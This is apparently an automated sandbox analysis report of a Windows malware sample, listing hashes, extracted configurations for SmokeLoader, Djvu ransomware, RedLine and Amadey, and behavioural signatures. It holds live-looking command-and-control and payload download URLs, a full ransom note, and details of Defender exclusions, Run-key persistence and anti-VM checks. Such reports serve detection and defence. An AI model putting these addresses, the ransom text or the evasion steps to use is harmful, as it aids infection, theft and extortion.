Analysis
-
max time kernel
300s -
max time network
306s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
15-10-2023 22:23
Static task
static1
Behavioral task
behavioral1
Sample
a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe
Resource
win10-20230915-en
General
-
Target
a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe
-
Size
238KB
-
MD5
94bb161392626d940ad4e026024ffdd2
-
SHA1
aaafe0247760530a93f7802846ac7ab00cee5940
-
SHA256
a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271
-
SHA512
02e2ec821b0a0e8b03bfa92d7f8c85fc8d29b3090ce745284d1d32ca4961eb295686be3be7d3de86ad1f6ec757fe84eec7daefb05eb9a42c4e0a24432d1a184c
-
SSDEEP
3072:9ecebWhRvPPHknr2H3bXuoDuJB2how57qRTpg0TT:4/ChRvPc0XqRpT
Malware Config
Extracted
smokeloader
2022
http://onualituyrs.org/
http://sumagulituyo.org/
http://snukerukeutit.org/
http://lightseinsteniki.org/
http://liuliuoumumy.org/
http://stualialuyastrelia.net/
http://kumbuyartyty.net/
http://criogetikfenbut.org/
http://tonimiuyaytre.org/
http://tyiuiunuewqy.org/
http://wirtshauspost.at/tmp/
http://msktk.ru/tmp/
http://soetegem.com/tmp/
http://gromograd.ru/tmp/
http://talesofpirates.net/tmp/
Extracted
djvu
http://zexeq.com/raud/get.php
-
extension
.pthh
-
offline_id
43WPLl8Cnh3dZoiWhf8tP8Q9CrMBVUL2dwHB2Rt1
-
payload_url
http://colisumy.com/dl/build2.exe
http://zexeq.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-dHFDYXqlkk Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0808ASUDr
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
146.59.161.13:39199
Extracted
amadey
3.87
http://79.137.192.18/9bDc8sQ/index.php
-
install_dir
577f58beff
-
install_file
yiueea.exe
-
strings_key
a5085075a537f09dec81cc154ec0af4d
Extracted
smokeloader
pub1
Extracted
smokeloader
up3
Signatures
-
Detected Djvu ransomware 9 IoCs
resource yara_rule behavioral2/memory/4616-20-0x0000000004A20000-0x0000000004B3B000-memory.dmp family_djvu behavioral2/memory/4420-21-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4420-23-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4420-24-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4420-25-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4320-30-0x0000000000B40000-0x00000000012C0000-memory.dmp family_djvu behavioral2/memory/4420-321-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4400-359-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4400-361-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Detects DLL dropped by Raspberry Robin. 6 IoCs
Raspberry Robin.
resource yara_rule behavioral2/memory/4320-37-0x0000000075750000-0x0000000075912000-memory.dmp Raspberry_Robin_DLL_MAY_2022 behavioral2/memory/4320-39-0x0000000075750000-0x0000000075912000-memory.dmp Raspberry_Robin_DLL_MAY_2022 behavioral2/memory/4320-42-0x0000000075750000-0x0000000075912000-memory.dmp Raspberry_Robin_DLL_MAY_2022 behavioral2/memory/4320-38-0x0000000075750000-0x0000000075912000-memory.dmp Raspberry_Robin_DLL_MAY_2022 behavioral2/memory/4320-110-0x0000000075750000-0x0000000075912000-memory.dmp Raspberry_Robin_DLL_MAY_2022 behavioral2/memory/4320-260-0x0000000075750000-0x0000000075912000-memory.dmp Raspberry_Robin_DLL_MAY_2022 -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba payload 8 IoCs
resource yara_rule behavioral2/memory/3600-142-0x0000000005070000-0x000000000595B000-memory.dmp family_glupteba behavioral2/memory/3600-153-0x0000000000400000-0x0000000002FB8000-memory.dmp family_glupteba behavioral2/memory/2952-196-0x00000000050B0000-0x000000000599B000-memory.dmp family_glupteba behavioral2/memory/2952-198-0x0000000000400000-0x0000000002FB8000-memory.dmp family_glupteba behavioral2/memory/3600-251-0x0000000000400000-0x0000000002FB8000-memory.dmp family_glupteba behavioral2/memory/3600-262-0x0000000000400000-0x0000000002FB8000-memory.dmp family_glupteba behavioral2/memory/2952-290-0x0000000000400000-0x0000000002FB8000-memory.dmp family_glupteba behavioral2/memory/3600-313-0x0000000000400000-0x0000000002FB8000-memory.dmp family_glupteba -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral2/memory/308-49-0x0000000000400000-0x000000000043E000-memory.dmp family_redline behavioral2/memory/2788-246-0x0000000000400000-0x000000000045A000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 21 IoCs
description pid Process procid_target PID 1164 created 1792 1164 latestX.exe 18 PID 1164 created 1792 1164 latestX.exe 18 PID 1164 created 1792 1164 latestX.exe 18 PID 1164 created 1792 1164 latestX.exe 18 PID 1164 created 1792 1164 latestX.exe 18 PID 1380 created 1792 1380 mi.exe 18 PID 2824 created 1792 2824 updater.exe 18 PID 1380 created 1792 1380 mi.exe 18 PID 1380 created 1792 1380 mi.exe 18 PID 1380 created 1792 1380 mi.exe 18 PID 1380 created 1792 1380 mi.exe 18 PID 1380 created 1792 1380 mi.exe 18 PID 2824 created 1792 2824 updater.exe 18 PID 2824 created 1792 2824 updater.exe 18 PID 2824 created 1792 2824 updater.exe 18 PID 2824 created 1792 2824 updater.exe 18 PID 2824 created 1792 2824 updater.exe 18 PID 3708 created 1792 3708 updater.exe 18 PID 3708 created 1792 3708 updater.exe 18 PID 3708 created 1792 3708 updater.exe 18 PID 3708 created 1792 3708 updater.exe 18 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C94.exe = "0" C94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ F1C3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mi.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts latestX.exe File created C:\Windows\System32\drivers\etc\hosts mi.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 4848 netsh.exe 4064 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F1C3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F1C3.exe -
Deletes itself 1 IoCs
pid Process 1792 Explorer.EXE -
Executes dropped EXE 38 IoCs
pid Process 4616 ED7D.exe 4420 ED7D.exe 4320 F1C3.exe 1256 F520.exe 2292 FC56.exe 4492 yiueea.exe 3828 1D5.exe 3600 C94.exe 4692 toolspub2.exe 4992 toolspub2.exe 2952 d21cbe21e38b385a41a68c5e6dd32f4c.exe 1164 latestX.exe 2824 updater.exe 3188 ED7D.exe 4400 ED7D.exe 1140 build2.exe 2780 d21cbe21e38b385a41a68c5e6dd32f4c.exe 5032 build2.exe 4352 build3.exe 1380 mi.exe 4712 C94.exe 2780 d21cbe21e38b385a41a68c5e6dd32f4c.exe 2880 yiueea.exe 2128 mstsca.exe 1668 bewehsf 4276 htwehsf 2824 updater.exe 5012 yiueea.exe 3708 updater.exe 1524 csrss.exe 2072 yiueea.exe 3656 injector.exe 1800 mstsca.exe 3428 windefender.exe 1340 windefender.exe 3080 yiueea.exe 4196 mstsca.exe 2008 mstsca.exe -
Loads dropped DLL 3 IoCs
pid Process 3848 regsvr32.exe 5032 build2.exe 5032 build2.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3192 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000a00000001af9c-28.dat themida behavioral2/files/0x000a00000001af9c-29.dat themida behavioral2/memory/4320-53-0x0000000000B40000-0x00000000012C0000-memory.dmp themida behavioral2/memory/4320-259-0x0000000000B40000-0x00000000012C0000-memory.dmp themida behavioral2/files/0x000600000001b014-1768.dat themida behavioral2/files/0x000600000001b014-2751.dat themida -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C94.exe = "0" C94.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C94.exe Set value (str) \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\54b9847a-dfce-46fb-8324-df75c65cd976\\ED7D.exe\" --AutoStart" ED7D.exe Set value (str) \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" d21cbe21e38b385a41a68c5e6dd32f4c.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F1C3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mi.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 api.2ip.ua 21 api.2ip.ua 60 api.2ip.ua 62 api.2ip.ua -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive DllHost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive cmd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive mstsca.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4320 F1C3.exe 1380 mi.exe -
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target PID 4616 set thread context of 4420 4616 ED7D.exe 71 PID 1256 set thread context of 308 1256 F520.exe 77 PID 4692 set thread context of 4992 4692 toolspub2.exe 93 PID 4320 set thread context of 2788 4320 powershell.exe 101 PID 3188 set thread context of 4400 3188 ED7D.exe 110 PID 1140 set thread context of 5032 1140 build2.exe 113 PID 2780 set thread context of 4352 2780 d21cbe21e38b385a41a68c5e6dd32f4c.exe 116 PID 2824 set thread context of 3660 2824 updater.exe 208 PID 2824 set thread context of 1528 2824 updater.exe 209 PID 2128 set thread context of 1800 2128 mstsca.exe 242 PID 4196 set thread context of 2008 4196 mstsca.exe 255 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN d21cbe21e38b385a41a68c5e6dd32f4c.exe File opened (read-only) \??\VBoxMiniRdrDN C94.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe latestX.exe File created C:\Program Files\Google\Chrome\updater.exe mi.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\rss d21cbe21e38b385a41a68c5e6dd32f4c.exe File created C:\Windows\rss\csrss.exe d21cbe21e38b385a41a68c5e6dd32f4c.exe File opened for modification C:\Windows\rss C94.exe File created C:\Windows\rss\csrss.exe C94.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe -
Launches sc.exe 21 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 808 sc.exe 4760 sc.exe 3656 sc.exe 4596 sc.exe 3312 sc.exe 4468 sc.exe 1716 sc.exe 1520 sc.exe 2756 sc.exe 2844 sc.exe 3780 sc.exe 3644 sc.exe 2824 sc.exe 3848 sc.exe 4068 sc.exe 4152 sc.exe 4384 sc.exe 304 sc.exe 3960 sc.exe 3308 sc.exe 688 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 3416 1256 WerFault.exe 73 3528 5032 WerFault.exe 113 2360 4276 WerFault.exe 146 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1D5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bewehsf Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bewehsf Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1D5.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1D5.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bewehsf -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2660 schtasks.exe 1860 schtasks.exe 2468 schtasks.exe 4312 schtasks.exe 1748 schtasks.exe 1192 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1892 = "Russia TZ 3 Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot mstsca.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DllHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2182 = "Astrakhan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" windefender.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 mstsca.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM netsh.exe Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control\NetTrace\Session netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-292 = "Central European Standard Time" 